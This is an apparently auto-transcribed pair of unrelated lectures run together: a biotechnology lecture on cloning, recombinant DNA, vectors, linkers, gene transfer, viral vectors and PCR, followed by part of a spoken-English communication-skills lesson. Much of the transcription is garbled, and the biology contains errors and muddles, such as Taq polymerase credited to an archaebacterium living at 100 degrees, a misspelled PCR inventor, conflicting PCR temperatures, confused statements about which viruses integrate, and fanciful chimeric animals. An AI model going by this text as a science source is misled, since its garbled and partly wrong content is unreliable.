in 2000 through the cloning these are some of the examples in the cloning that the production of or the new baby, so from the test tube baby, and there are certain examples which come along the way of mammalian cloning. And this is a basic example where the human gene was inserted into the sheep. That is the finest example you will see after the dolly. And this particular picture shows the cloning process in the different animals, the production of the first cloned rat called as a Ralph, and production of CC cats, it is called as a copycat, which generally used in the word will be used the word generally used in cartoons, copycats, and these pet animals are also being developed through the process of cloning. So this is another aspect of the cloning where the cloning helps in therapeutic way, I can say, and they will be cultured and they will be transformed again to that human for curing the diseases. Through this therapeutic cloning, we will yield many type of cells which can be useful in this process of curing the diseases. And this is one of the example that has been given as a first clinical trial on basis of the therapeutic usage, I can say. DNA technology which is being used in the cloning. There are might more examples that have been evolved, like the production of anticoagulants, production of blood factors, colony stimulating factors, erythropoietin, which is a main substance in the RBC, and the growth factors, the human insulin. Generally we use this example in the RDNA technology often, and interferons and interleukins and monoclonal antibodies and superoxidase dismutase, which is very essential for this antioxidant, and the vaccines, different kinds of vaccines being developed through this RDNA technology. And what are the potentials of the cloning and what are the problems? So this slide will depict a small example, like we can develop new organs or organisms, and we can replace a lost cell by producing in the mother's womb, and gene therapy is one of the best way for the cloning, and we can reverse the aging. This research is going on, but there are some problems that the overgrowth syndrome can be one of the problem, and the insertion of genes can be controlled or cannot be controlled in the cloning process. So this is a major aspect of the cloning where you will find the technology. So this is called as a RDNA technology. This RDNA technology basically a technology where you will find or you will take a DNA which you require. Take an example of an insulin.
or growth hormone or the hormone or the any product gene that you require as a final product. So, take the foreign DNA and insert that foreign DNA into a vector. The vectors may be of many kinds, and produce a new DNA called as a recombinant DNA, and that will be inserted into a host cell. Generally the host cells are the bacteria, because they can be cultured in no time, and these bacteria will develop into a mass of culture, and from that culture or from that bacteria you will blood factors, whatever may be. So, there are two types of vectors in general you will find, or two types of vectors which will be seen in the biotechnology. One is called as the cloning vectors, which are useful for the cloning process, and the other one is called the expression vectors, which will be useful for the final production of some product. It might be a protein or an enzyme. So, the foreign DNA may be a genomic DNA, foreign DNA may be a cDNA or amplified DNA or synthetic DNA, which will be used in the process of the rDNA. So, hope this picture is not clear to you, but this picture will show that this is a bacteria where it does not have the foreign DNA or the transforming into a bacteria. This is called as a transformation. And after the transformation, you will culture this bacteria in a medium. It might be agar or agar-agar or whatever may be the medium. Then the cultured bacteria may be taken off, because you need to select that your DNA presence is important. You need to separate the bacteria that contains your recombinant DNA from the non-recombinant DNA. They are called as a transformants. So, after separating, you can separate your desired DNA or the required DNA, or you can find the product. So, this will come under the process of expression vectors. So, here if you can use this slide. So, these are the recombinant DNAs, might be useful for the pest resistant gene which will be inserted in future in the plants, or the genes which will be used as a bacteria cleaning the toxic waste, which will be oil spills, which will be generally seen in the oceans. And some products may be seen, and the growth hormone, which is a lacking in some humans, and it can be treated by extracting from the bacteria, because they plays a vital role. The major enzymes are the alkaline phosphate, because it removes the phosphate group from the 5' end. You all are aware that there are two ends, one is called the 5' and other one is called the 3'. Generally the 3' end will have the free hydroxyl group, and the 5' end will have the phosphate group. The phosphodiester bond will be formed between these two ends, that is from the 3' to 5'. So, if you would like to eradicate the self annealing of a DNA or primer, whatever it may be, we need to remove the phosphate and convert into OH. So, that can be done through the enzyme called as alkaline phosphate, and most of the students know that the most important enzyme in the recombinant DNA technology is the ligase, which joins the two nucleotides by establishing the phosphodiester bond. And nucleases you are aware that this particular enzyme is useful for removing the DNA or the cuts the DNA or shortening of DNA. And while you study the topic of replication, you heard about the polymerases, DNA polymerase 1, 2 and 3. So, polymerases are the main enzymes in the molecular biology, and these enzymes will be useful for synthesis of new DNA fragment from a template or from a parent. And DNA is an enzyme, DNase is an enzyme that will be useful for production of single stranded nicks in the DNA. And you all are aware that exonuclease is an enzyme which will remove the nucleotides from the 3' end or from the 5' end. So, another important enzyme is called as polynucleotide kinase. These two enzymes are and the second row of enzymes which will play a vital role is called as restriction enzymes, because they cleave the DNA at a specific site. And the reverse transcriptase is an enzyme that will create or synthesize a new DNA from an RNA. And the last but not least, there is an enzyme called as the Taq polymerase, which will be used rapidly or widely in the process of PCR. So, this is a general picture where you are taking a vector called as a plasmid and cleaving that vector with a specific restriction enzyme and cleaving your desired DNA with the same enzyme, because the cleavage will be of a same pattern. Hence, you can add your insert into your plasmid at a specific site at a specific point. This is called as a restriction enzyme working out, I can say.
and this will create a production of a new DNA by using an enzyme called as a ligase. Ligase is nothing but addition. So, if you can see this particular picture, the restriction enzyme will, if you add a restriction enzyme to a target or a plasmid, it will search for its site, and if it is a long way, it will jump or slide and reach the particular point, and there is a reaction called as a coupling, and it denatures the hydrogen bonds, and there is a cleavage. The cleavage of restriction enzymes depends on one type to other type, because some restriction enzymes will cleave in a pattern called the sticky ends or cohesive ends. They can attach easily, and the other one is called as a blunt ends. Please remember, my dear students, the blunt ends are the ends where there is a minimal chance that there will be fusion of these two blunt ends rather than the sticky ends. So, the blunt ends can be ligated with a special mechanism or special, I can say, DNA fragments called as a linkers or adapters, which we will read in the next few slides. So, every restriction enzyme has a specific sequence to cut, and if you see this particular picture, so this is a nucleotide, this is the structure of nucleotide, and this is the sequence of nuclease enzyme, and the cleavage cleavage can happen through a restriction enzyme. It might be hydrogen bonds or it might be a phosphodiester bond. So, once the cleavage has happened, they both can be ligated, the new and the plasmid can be ligated by the ligase, and the reaction can be performed by different set of enzymes. And these are the different vectors which will participate in the process of rDNA technology. The smallest parts, the most widely used is called as a plasmids, but a vector should have an origin of replication ORI site, which it starts the replication, and selectable marker where you can identification of a gene can be happens through the antibiotic resistant gene or through the production of an enzyme producing gene. It may be a LAG-Z. So, plasmids are the short vectors or a small vectors which will carry a small DNA, and the second group of vectors are called to be the cosmids. With the plasmids or the vectors, the phases phase virus will attack the bacteria, and you already read in the topic of transduction. And the fourth and fifth important things are called as a BAC and AG, or bacterial artificial chromosome and yeast artificial chromosome. The bacterial artificial chromosome and yeast artificial chromosomes are the two vectors which has a sequence of a large sequence, and which can be useful for incorporating the big sequence of DNA. So, if you take an insulin gene, it is a small gene. If you would like to insert a big gene which contains more than 2000 or 3000 nucleotides or the base pairs, that can happen through the big vector, so called as a BAC, or generally you will insert your required DNA. So, I already told you that inserting your DNA required or DNA which you require or desired or insert into a plasmid or a vector can happen through ligating the linkers and adapters. So, adapters will plays a vital role in addition of these two particular blunt ends, and the vectors which have been combined with a DNA which you require, they are called as rDNAs. These rDNAs should be incorporated or transformed into the bacteria for the culture to get your product. So, that can be termed as a gene transfer, which we will discuss in the next topics. So, this is a common slide where total aspect of DNA was given, and this is the final cloning that you have cultured after the recombinant DNA. You have cultured your recombinant DNA in a through the bacteria, and it can be screened by the antibiotic resistance or blue white screening, which will be useful for identifying the LAG-Z gene or enzyme producing gene. So, this is about the rDNA technology, and in this rDNA technology, the aspects that will be used are called as adapters and linkers. So, adapters
So, what are mean by adapters and linkers? These are called as a coupling tools. So, I already told you that there are sticky ends and blunt ends. So, both has to be ligated to the plasmid. Some restriction enzymes will cut in a blunt way and some restriction enzymes will cut in a sticky way. So, they can be ligated by using the linkers and adapt A and T or G and C. So, linkers are double stranded DNA which are self complementary oligomers, and they have a specific restriction site. That means, if you add a linker, it has to be added to the plasmid or to a vector, and after addition these linkers can be ligated by using a D4 DNA ligase, which is very effective ligase. And if you can see this particular going to add, it has a blunt end. So, you are adding two different linkers here and you are using a restriction enzyme, and this restriction enzyme and it can be added easily to the plasmid. If you can look at the second picture, look at this this is a plasmid where you have cleaved with the restriction enzyme, and you are cleaved with the same using the restriction enzyme, you cleaved the DNA, desired DNA in the same pattern, but it is having a blunt end. This blunt end has to be added to this portion. So, how it will be added? It might be added or it might not. If it doesn't work out, you need to use a aspect called as adapters or the linkers. So, if you look at this particular picture, these are the blunt DNA fragment that you are taking, and you are using a linker. It is a EcoR1 linker which has a specific sequence and it has a restriction site. So, there will be formation of a phosphodiester bond between these two. You are adding these two. So, this picture has clearly given the description. This is a short DNA. Okay, this is the target DNA. Now, what you are doing here is you are adding your linker with this DNA. Now, you are using a restriction enzyme that has been cleaved into a specific portion. Now, it can be ligated easily with the plasmid. That is the beauty of the linkers, and that is the beauty of the technology. And these are the different uses that can be used by the linkers, and the most important thing is it will be used in the diagnostic purpose and tagged with the fluorescence, so that you can find out the foundations in the uses of linkers. We will discuss in detail in next slides. So, what are the adapters? And it will be cleaved by using the restriction enzyme, and the same restriction enzyme will cleave this plasmid, so that these two will become the complement. But when it comes to the adapter will have a blunt end at one point and a cohesive end at the other point, so that it can be added easily with the target DNA, and the same thing will be added to the plasmid which has a complementary to the vector. It might be as if we know that, and they have the protruding sequences which will be seen and which will be different from the linkers. So, look at, we are adding the adapter in this sense, but sometimes we need to enhance the length of the DNA, so that the two adapters can be ligated like this. If you do not want to ligate these two adapters, what we need to do now? Imagine this is a 3' end and this is a 5' end. We need to remove the phosphate from this particular junction, because it should not ligate. Then this can be performed with an enzyme called as alkaline phosphatase. If you want to ligate this, what we need to do? We need to use an enzyme called kinase. So, that is the ligation, sometimes it has to happen. So, these are two different types of varieties of adapters which will be seen, and they have a sequence and they have a different varieties basing on their nucleotides. And coming to the aspect of adapters linkage, the DNA ligase cannot form phosphodiester bond between the 5' OH and 3'. I already told you that while you delete or while you terminate the phosphate, it will become OH. So, this can prevent the formation of a phosphodiester bond, and this can prevent the self ligation between the adapters. So, the third most important thing in the ligation is called as a homopolymeric tailing. So, this technique which had a speciality that here you will use an enzyme called as a deoxynucleotidal transferase. The enzyme itself has a stuff, I can say, because it is transferring some deoxynucleotides which may be DATP, GTP, whatever it may be, the 4 nucleotides. So, the transfer of the nucleotides to the terminal part of the DNA. So, the terminal part of DNA which has, if you can look at this particular slide, look at this is the target DNA.
So, it has a blunt end, you do not have the elongated end. Now, you are using common nucleotides, so it is called homopolymers. So, nucleotide is a monomer, adding different monomers become a polymer. So, it is adding a Cs, okay, cytosines at this place. At the same other end of the plasmid where it has to be ligated, two can be ligated in such a way that they will form a recombinant DNA. So, these type of ends are called as a homopolymeric tail endings, and the enzyme is called as terminal transferase, which has an importance. And there are many factors called as a magnesium and cobalt which enhance the reaction, and this is one of a special linkers, I can say linkers, adapters, and the homopolymeric tails are the add-ons which can add the blunt ends sometimes with the plasmid or blunt ends with the desired DNA with a vector. So, in the recombinant technology, just recollect once that we have already told you that process of recombinant DNA technology. We have given a description of vectors. Now, we are talking about the insertion of vector with the plasmid by using this technology. So, there are multiple more applications which are connected to this topic, and we will study in detail in the next. The applications of these linkers and adapters has a wider role that will be used in different technologies. So, the double stranded or single stranded DNA will be labeled so that we can identify, and they will be used in rapid amplification of cDNA ends, and also used in situ localization of apoptosis, and this corresponds to a topic of linkers, adapters, and homopolymeric tails. So, coming to the topic of the delivery of that particular vector into the host. So, so, what it meant by whatever may be the vector, and you are going to deliver into a host. So, the delivery of your recombinant DNA into a host may varies from the cell to cell. In bacteria, you will use a word called as a transformation, and it will be induced or it will be enhanced by the calcium chloride. And transduction and electroporation are the two processes. And plant cells, you will find the transfection, and most commonly used is called as agroinfection and liposome fusion and particle bombardment. In animal cells, or the animal recombinant DNA can be transformed into, it can be incorporated into the host cell by the transformation, electroporation, microinjection, particle bombardment, liposome mediated gene transfer, and virus method, which is one of the important methods while you compare with the other methods. Please remember, dear students, the two aspects of this gene transfer depends on only one particular schematic representation. One using the mechanical methods, and other one by using the biological method. So, virus vector method will come under bombardment. This will come under the mechanical way of inducing, or a mechanical way of incorporating your DNA or the gene into your vector. So, I would like to explain these following methods in detail. So, what it meant by electroporation? Name itself indicates that there is an apparatus called as an electroporator apparatus, where some polar molecules, kindly see this sentence, introduction of polar molecules into the host cells by high voltage electric impulse. You are giving an impulse. So, we are aware that the plasma membrane is a charged membrane. So, by giving this little electric impulse, there will be a variation in the plasma membrane that can be termed as a creation of a porosity. So, that porosity or the formation of pores will be useful for the delivery of your desired DNA into the cell, and that is why it is called as a electroporation. So, if you can look at the process, we are going to introduce the DNA molecules into the host cell, where you are increasing your impulse or the electric impulse to 10,000 to 1 lakh volts or microvolts. So, this will be from milliseconds to microseconds to milliseconds.
then that disturbs the plasma membrane for the creation of it. Well, if you remove the pectin, there will be easy or the increase of DNA evaporation into the cell, and in some plants the tobacco mosaic host cells. And the second most important is a micro injection. Name itself indicates that there is a micro needle, and you already taken a quantity of DNA or the recombinant DNA, and directly you are incorporating that DNA into the cell by keeping a holding pipette. So, this is also one of the important methods generally used in the animals, specially called as a gene, and holds the target cell, and you are inserting your concerned or the desired DNA into the cell, and there is no requirement of any marker gene, and there is no requirement of any what I can say specialized mechanisms, and target gene can directly enters into the host cell, and you need to use a little dye for knowing the DNA or for marking the DNA whether it is there or not, and it will be useful for creating the transgenic mammals. And the third important method is called as a gene gun method. It is also called as a biological ballistics. The name itself indicates the ballistics are nothing but the weapons which has the ballistics are the biggest weapons which will be used in the military, where it has a highly projectiles. They will be projected from land to air. So, they will create lot of energy, and they will move from one place to other place with by producing lot of energy. So, the process also similar to that that particular word, so that it is given as a biological ballistics. So, high velocity micro projectiles will be delivered from the mission, and that micro projectiles are the micro particles which contains your desired DNA. So, along with the micro projectiles, look at that micro projectile mediated transformation. So, this will be useful for the transformation of your DNA from the part to the particular host cell. So, with a high acceleration your particles are moving. So, the basic equipment to generate the acceleration, it is a costly affair, but it is a non-toxic, and it is a micro size and high density with a rapid penetration. So, look at this apparatus, you are using a helium gas and pressurizing or accelerating, hence your particles will move by chasing or a special screen called as stopping screen. But the stopping screen will stop the macromolecules of the particles and allow the micro particles which enters into your host cells. So, that is a beauty of the gene gun method, and this is an apparatus structure which generally available in the market. And there are certain disadvantages. What are the disadvantages? It is a costly consumables, and there will be erratic random integration, and associated cells may be degraded with this gene gun method. And coming to the liposomal gene delivery, the liposomal gene delivery is a method, a sweet method I can say, because we all know that the plants or animals or the cell wall is made up of and that liposomal vesicle will be added to the host cell. Obviously, these lipids will combine, or the entry will be enhanced by adding a substance called as a polyethylene glycol. So, this is called as a liposomal gene delivery. So, what are the advantages and disadvantages? There are a lot of advantages because it does not require, it is not a toxic, and there is a less chance that it does not coat with any gold or any material, and I can say there is a demarcation. So, the basic advantage of liposomal transformation is that it is not a toxic, and they can protect directly from the nucleases which are present at the nucleus, and RDNA can be stored in the liposome forever. So, last method is the polyethylene glycol mediated transformation, where the naked DNA can be transformed into the cells by utilizing PEG with the presence of a divalent cations. So, there are little disadvantages in this technique, and always there is a advantage and disadvantage in usage of any technique. So, the second most important thing is usage of the virus, and these viruses are, you know that they are very dangerous. They have the tropism, they have the viral genes. Dear students, that we have to identify the viral genome and shut off some of the genes which will cause a reverse transcriptase. You all know that the reverse transcriptase is an enzyme which will convert the mRNA to, or preparation of a DNA from an mRNA. So, if you insert this particular virus, or if you use this virus, the mRNA can be transformed into DNA, and that DNA will be useful for the other processes, especially for the cancer.
So, virus generally used in two ways, one is a short term and the other one is a long term. So, some viruses are used for long term expression, therapeutic transgenes I can say. So, this long term expression can happen through some viruses, it all depends on the capacity of the virus. So, the can be in the dividing cells only this virus can activate or this will incorporate its genome, and this will happen, and non dividing cells it does not work out. And look at the, or it is attacking the unhealthy cells, and this may be converted into normal cell or production of a normal cell in a rapid number, which will be useful for the patient recovery. The second one is called as a adenovirus. This is a specialized virus which has a capacity of 36. The retrovirus is having a capacity of both on the dividing and non dividing cells, but it cannot insert its genome into the host chromosome. That is only the defect of this particular virus, but expression will happen, and initially it stays in the host cell for few months. So, expression time is important. So, the limitation is it shows the high immune response. If a virus is enters, the adenovirus will cause a high immune response, and that is one of the limitation to this virus. And the third important virus is a lentivirus. You all know that HIV virus, one type of virus, and there is a lot of ethical issues are going on this virus. This also contains reverse transcriptase of this particular lentivirus. And the important aspects of this virus is it has a prolonged transgenic expression. Look at it, has a prolonged it can express its activity up to 1 year. That means in the therapeutic use, a healthy genome that has been incorporated into the virus to the particular patient, and it can be expressed till 1 year. That's a positive of this particular lentivirus. And the second one and the fourth most important is called adeno-associated virus, and hence this is the smallest virus, and it cannot carry a long bit of genome. And the second most important thing is it will replicate with the help of other viruses. So, it is also widely used in the in the gene technology. And the other virus is vaccinia. This is the largest double stranded DNA with a 200 kb capacity, that it can carry more amount of solid tumor. Tumors are nothing but one sort of a cancerous habitation seen, cancerous habit seen in the humans, and vaccinia is widely used in this process. And the limitations are it produces a cytotoxic T cell response, which is an immunal reaction, and they are not used in treating the chronic disease because of the cytotoxic effect. And last one is called the herpes simplex virus. This is also a specialized virus which has a capacity of 150 kb, and it can carry the n number of cells. That means any type of cells they can attack the neural cells, because any damage, if it happens to neural cells, it is not curable. It can be cured by using the gene therapy and by a technology through the virus. And it has a non-integrating unit and persists in the cytoplasm for the years. Look at this. The persistent in cytoplasm for years has a latent episomal state. So, we can use this virus for longer time, and high cytotoxicity is one of the limitation for this virus into the host. Right. So, coming to the aspect of last aspect, that is called as a polymer chain reaction. Most of the students are aware of this topic. So, this is a mechanical process or mechanized process for the production or amplification of DNA. Remember, my dear students, you need to study this topic in a systematic way. The first topic is about the cloning, and the second topic is about the recombinant DNA technology. The third topic is the biological vectors, and the fourth one is mechanical transfer of the gene transfer to a concerned host. So, the process is very clear so far. But if you see this topic, this is linked to a topic called as a replication. We are studying this replication since intermediate. Cell is dividing in a rapid way, the DNA percentage may decrease. So, the replication process almost implies to the polymer chain reaction. So, you are amplifying your desired gene in a machine called as a thermocycler.
The beauty of this particular polymer chain reaction is a polymerase. You are using an enzyme called as a polymerase, which has been derived from a specialized bacteria called as the Thermophilus aquaticus, which is an archaebacteria which lives in a spring 100 degrees. That's the reason they use this bacteria and use that particular enzyme called as Taq polymerase. And after and different type of amplifications are going on, and the PCR inventor, so called as Carey Mullis, has been awarded Nobel Prize in 1993. So look at, if you got a sample, the sample may contain a DNA. You don't have a larger portion of DNA. So if you lost this by or characterize a particular specimen or whatever it may be. So generally the PCR is if you remember the forensic for the cops, they will take and they will use this PCR technique for identification of the damages, I can say. So there are a lot of contents in the PCR, and we will go ahead as the time is very short. So the main processes are the initialization, denaturation, annealing, and elongation. What you are doing now, your techniques are called as a DNTPs. 2, the addition can be occurred by the polymerase. 3, it has to occur in a sequential way, be in a machine called as a thermocycler. So at about the principle, you all know that. So a cycle is nothing but it consists of 3 fragments: one, denaturation of double stranded DNA, what you are expecting, and annealing of primers, and extension of DNA molecule, DNA into number of copies. The used structure or used mechanical structure is called as the thermocycler, and one cycle consists of these three elements. So DNA, you are taking some example, you are taking an insulin DNA or insulin fragment or a gene. You would like to amplify the DNA. So you are taking that a particular DNA, it may consist of long or short DNA. So these are the different chemicals that has been used in the process of PCR, and this magnesium chloride it will be useful for stabilizing the reaction, and there will be usage of some dyes which will give the coloration to the PCR. So in the initialization, what you are doing is you are making the DNA into fragments. So fragmentation can be happen in the replication by the enzymes. It may be topoisomerases, it may be gyrase, or it may be of helicase, like that. But in this process, what is happening here is you are separating these two the DNA fragments or the templates. That means you are breaking the hydrogen bonds. The breakage can happen through by raising the temperature to 92 to 94 degrees centigrade. That is called as a denaturation. You are denaturating the DNA and separating the act as initiators for formation of a new strand. So the primers are of 2 kinds. One is called the forward primer, second one is called as the reverse primer. And please remember, the process of addition of primers is called as annealing. Annealing is you are adding a 70 degrees. The ideal temperature is 58 and 62 degrees. Then once the primer get added, then a thermophilus bacteria, it can act. Generally the enzymes will denature by increasing the temperature, but this will be active while increasing the temperature. So the extension of this particular primer stand happens by adding the nucleotides. They are called as the DNTPs. So DNTPs will be added to each nucleotide by this enzyme called as a Taq polymerase, by which the strand will grow. So one is parent strand, the other one is a new strand. Hence you are producing a new different 2 strands. This is called to be the extension. This can be termed as an extension. So you will denaturation, annealing, and extension. Like that, 2 to the power of n number of cycles will be performed, and in generally the cycles may vary from species to species. So here you will see a single copy of DNA strand over 1 trillion copies may be generated by the 40 cycles. So this is the DNA marker that you are using, and these are the amplified DNAs in each cycle. So you can identify whether your DNA is produced in the sample or in the content that has been inserted into the thermocycler by using a method called as a electrophoresis. And this is the graph that is showing the total processes. One, you are raising the temperature to 94 degrees or 96 degrees, and with the time the primer annealing happen where you are decreasing the temperature. Once again you are increasing the temperature to 70 degrees for the extension of particular sequence. So this is called as one particular cycle.
And there are many errors that may happen in the PCR, that the composition of DNA is very important between bonds, where the GC component is more, there might be chance of usage of much more energy. Second, there might be chance of primers that they can self anneal, and it can be stopped by using some chemicals in the addition of primers. And the long DNAs may be generated by the PCRs through the PCR, but sometimes there might be chance of depurination may happen, and that can be avoided by using the high pH buffer and decreasing of denaturation temperature and use of proofreading DNA polymerase. Important use of color DNA polymerase, and buffer is also important for production of a good amount of amplification. So, if you come to the types of DNA PCR, there are a lot of PCRs that have been available, and in that I'll quote you two examples. One is called the reverse transcriptase PCR. This is one of the best method where you can take an RNA and convert into DNA, and different type of PCRs are available. Real time PCR. This PCR is a real time. Name itself indicates that. That means in every step you can identify the contents or amplicons through a chemiluminescence. That is a specialty in real time, where your desired DNA will be present at middle at first, and later by converting it to circular it will be cleaved by the restriction enzymes, and the two ends of your linear DNA will consist of your desired DNA. And colony DNA PCR, it's a special type of PCR where the colonies of bacteria can be produced by, or expression gene can be produced, and nested PCR primers. Here you will use two primers for production of different aspects. So, this is a technology. And finally, I would like to conclude this topic in a clear way. If you use this recombinant technology in a positive and negative production of a Albert Einstein, and you may have a negative effect, that production of a negative impacted persons. And these are some of the pictures where the students generally used to like. There might be chance that production of a puppies from an eggshell and monkeys with tusks. So, this might happen. And look at this is a skatefish which has been, if it cloned with a butterfly, it doesn't happen, but if it may happens, there might be chance of the butterfly like skatefish will be seen in the sea, and the hippocampus with a crab, and rhinoceros with a fish, and deodon fish with a parrot which has the spiny edges. And finally, the elephants with a seal maybe conjointly form a new structure, and ostrich with antedon. So, this is about it's a big topic, it's a huge topic, but I try my level best for PG examinations. Thank you very much. Welcome to today's session. So we are covering the communication skill sessions for ESC program, the employability skill centers across Andhra Pradesh, and this is organized and brought to you by AP State Skill Development Corporation. Till last week you session on all the aspects of aptitude, and I'm going to take care of communication aspects where the idea is to give you a holistic skilling. So in the last session we spoke about what communication is, and I spoke about the communication tree, how it's very different from what you have learned in school. Then I spoke about the essentials of effective communication, and these are the essentials of effective communication, 6 of them: assertiveness, authenticity, open-mindedness, empathy, clarity, and listening skills. I spoke in detail what each of these points mean, gave you certain examples. Now I'm going to take it forward today. Now, communication type, we often hear different, that is called a verbal communication. Now, the common myth that we have is only a face-to-face communication is verbal, or it's actually called an oral communication. Anything that is written is actually deemed differently. The mistakes that people do is, if some
communication is done orally, they call it a verbal communication. For example, they say that, for example, if I'm talking about tomorrow there is a holiday and there is no written memo, there is nothing on the notice board. So people usually say, we were informed verbally, there is no written communication. Verb means action. So anything that's in terms of oral communication where two people are speaking, or when there is a communication in terms of a speech, that is oral communication. When there is a communication in terms of written item or anything that is written, it could be a memo, a text message, an email or handwritten note or a PowerPoint presentation. Anything that is written and printed is also a verbal communication. So that's again a myth. So I want to break that. Even a written communication is called verbal communication. Now these are gestures, expressions, body language. Now body language is a separate area which needs a lot of expertise, which needs a lot of these gestures, expressions and body language, or the other person who is the audience. Now your body language is the way we use our expressions, speaks a lot about what you are thinking and what you're trying to say. I may be saying something, but I may not mean it, but what I mean can be understood with my body language. When we go for interviews, when we go for any kind of presentation, any kind of conference, seminars, when we are speaking to one person, or in terms of body language. Now the body language is a completely different ball game. You need to understand the right body language. So there will be a separate session on body language only. So we'll talk in detail about that later. So please remember, communication type is of two types. The first one is verbal communication, where we talk about oral communication as well as written communication. So written and oral both are verbal communication. Not speaking a word, when you're not writing a word, you are just using gestures. There is no sound, there is no letters written or read. That is when you are reading something, that is verbal communication. Okay. Now I'm going to talk specifically on oral communication, or to understand clearly in terms of what is considered as what we call this, especially the student fraternity, since you are from a vernacular background in terms of your education or academics, you're considered as a person who needs a lot of improvement in terms of communication. And we always say that improve your communication expertise or your level of communication. There are two things which you need to take into consideration. Let me quickly display what do I mean by that. Okay. The first aspect is articulation. The second aspect is comprehension. Okay, let me align it correct. Okay, so there are two aspects, articulation and comprehension. Now what do I mean by articulation? Ability to express ideas, in a language. All right, that is what articulation is all about. Let me change the color so that you can make a note of it. That is what it means. Ability to express ideas in a language. Comprehension, what do we mean by comprehension? Now the issue that most of us face today, now that I'm speaking to you, you are able to completely understand what I'm saying, right? So comprehension is something, this is not an issue. So let me mark it as green. So comprehension is something which is not an issue because you are able to understand what I'm saying. It may not be completely, but to an extent you are able to understand. But when I ask you to speak, you find it difficult to express yourself in a language. Now when I say in a language,
that means a language which is different. Now I am not good at Telugu. I cannot understand very clearly, but to an extent I can understand, but I can't speak very well, as good as my comprehension. The same thing applies to all of you. When it comes to English language, your comprehension is better than your articulation, which means you are not able to express yourself only in English. But if I say that you can speak in Telugu, you are very quick to respond any kind of question. You are confident, you are not nervous, you have a lot of information which you can express yourself through. But when it comes to comprehension, understanding, you find it easier. But when it comes to speaking, you find it difficult. So two aspects, articulation and comprehension. Now in order to resolve this issue, you need to go through a little bit about oral communication. It's not written communication. I'm here talking about oral communication only. There are 4 fundamental pillars. What are these pillars? The first one is pronunciation. Make a note of these. The second one is grammar. The third one is vocabulary. And the fourth, fluency. These are the 4 fundamental pillars of oral communication. And we're going to talk about each one of them in detail, because my intention is to, in order to do that, we need to understand the fundamentals of it. In order to understand the fundamentals, you need a communication tree. Now this tree, if I have to segregate or if I have to break it down, first and foremost, in order to communicate, I need something called a language. Okay, let me align it correctly so that you can see it clearly. Okay, so you have communication tree for oral communication. First thing that you need is a language, any language for that matter, but here we are talking specific to English language. Now this language or any language can be broken into sentences. So in a language you basically speak sentences. The sentence is broken into words. We break the language into sentence, the sentence into words, and the words into letters. But this is where you go wrong. We are talking about oral communication, when listening, which means the words are not broken into letters, they are broken into sounds, letters. So what do we mean by pronunciation with that example? Pronunciation refers to the way in which we make the sound of words. It also means creating correct sounds using the muscles of our mouth, tongue and lips, etc. There are other important aspects of pronunciation, which is word stress, sentence stress, linking, intonation. Now what do we mean by these? Word stress, for example, emphasis on certain syllables in a word. Let me show you an example. I am going over to the next slide so that I can give you an example of word stress. Now what did word stress mean? It says emphasis on certain syllables in a word. Say for example, I have the word which is also my hobby, photography. Okay, if I have to break this into syllables, how many syllables do I have? 4, 2, gra, phi, which means I have 4 syllables. Okay, now I'm going to use another word which is related to which is photograph. And how many syllables do I have here? Photograph.
Now pay attention. When I pronounce this particular word, photo is the first syllable. Please give me the photograph. Now when you speak to someone, stop using the word pic. Please send me a pic. Now pic means P-I-C-K. It's a short form of picture, but please don't use that word. So in this case, this particular word has 3 syllables and I pronounce this as photograph, which means I'm stressing on the first syllable. But when I look at this particular word, I pronounce this as photograph, 4 syllables. But in this case, I stress on only the pronunciation of each syllable or the entire word, but also the word stress come into the picture. So here I pronounce this as photograph, here I pronounce this as photography. Clear? What's the next one? Sentence stress. Now in word stress, I was emphasizing on a particular syllable in a word. In sentence stress, I emphasize on a certain word in a sentence, which means the end. So sentence stress, I'm going to write a sentence. Okay, so let me change the color so that you know that this is the sentence is, you cannot get an admission in the university unless you score a minimum of 90% in your entrance test. Now which word do you think should get the stress? Because here I am notifying someone orally. You cannot get an admission in the university unless you score a minimum of 90% in your entrance test. To denote what exactly I am trying to communicate. You have to pay a penalty of 5,000 to get the certificate. Now here I'm going to stress on have. You have to pay a penalty of 5 word. How the meaning will change or what I'm trying to say will change. To get the certificate. Second sentence, you have to pay a penalty of 5,000 rupees only through a demand draft to get the certificate. Now the word only is taking the stress because I'm emphasizing there is no other way you can pay the penalty to get the certificate. It's accepted only through a demand draft. But the first one, all I'm saying is you have to pay a penalty. So that's exactly what a sentence is. So when you're communicating with someone, it could be over the phone, it could be face to face. This sentence stress takes more importance when you particular word in a sentence, they get the message more clearly. Now if I'm speaking to face, I can the hand coming down, it's coordinated subconsciously, so it's really underlined for you in your mind. You have to pay a penalty to get the certificate. And if I'm talking about the second sentence, I say you have to pay a penalty of 5,000 rupees
face, it's easier to understand because other person can see me. But when I'm speaking to the person on the phone, they can't see this gesture, right? Now this gesture is coming very naturally to me. Even when you're speaking on the phone, we use our hands. We don't sit like a robot and speak. But the other person cannot see. So that's where your intonation comes into the picture. The fourth, intonation. Intonation is the rise and fall of our voice as we speak. Now this rise and fall is very important, but before that the point is there as linking, joining certain words together. So let me explain what do we mean by linking, and then I will explain in detail what do we mean by intonation. Alright. So let me take the same slide. I want to quickly show you the example of linking here. Please give me 2 eggs. Now when I pronounce this, to get a little knowledge on let me quickly explain what do I mean by this. You need to get a quick knowledge on vowel sounds. So when I say 2, I am using the sound. So 2 egg. So this is this word is ending with a vowel sound. This word is starting with a vowel sound. So when you have 2 words next to each other, one ending with vowel sound, another one starting with a vowel sound, you can combine or link these 2 sounds together. Okay? For example, if I have the word two eggs, I can just use this particular sound, a sound in between these two eggs. So when I talk about linking in detail, you will understand what do I mean by this. I know it's a little confusing. Let me move over to intonation. Now intonation, as it reads here, it says the rise and fall of a voice as we speak. Now there is correct intonation, there is incorrect intonation. Let me quickly explain. Are you going to the market? Are you going to the market? So when I display this particular word, let me change the color so that you can see it clearly. Are you going to the market? Now, are you going to the is flat. Are you going to the market? This is going up because the last word denotes like it's a question. Now when you're speaking, a lot of people ask a question, but it sounds like a statement. So when you are speaking, your statement has to be flat, and when it's a question, the last word has to be a rising tone. For example, if I say, I'm going to the market. So here, let me add the line for you so that you can understand what do I mean by this. I'm going to the market. Now this is a statement and it's a flat intonation, but of intonation is specific to making a mistake in terms of rising and. Now when the answer comes like a question. For example, if it's a quiz program and you have to know this answer, very, very important. If you are a student, you definitely need to know who was the first Vice President of India, and it's his birthday tomorrow, President of India. So when I ask a question, who was the first Vice President of India, the answer is S. Radhakrishnan.
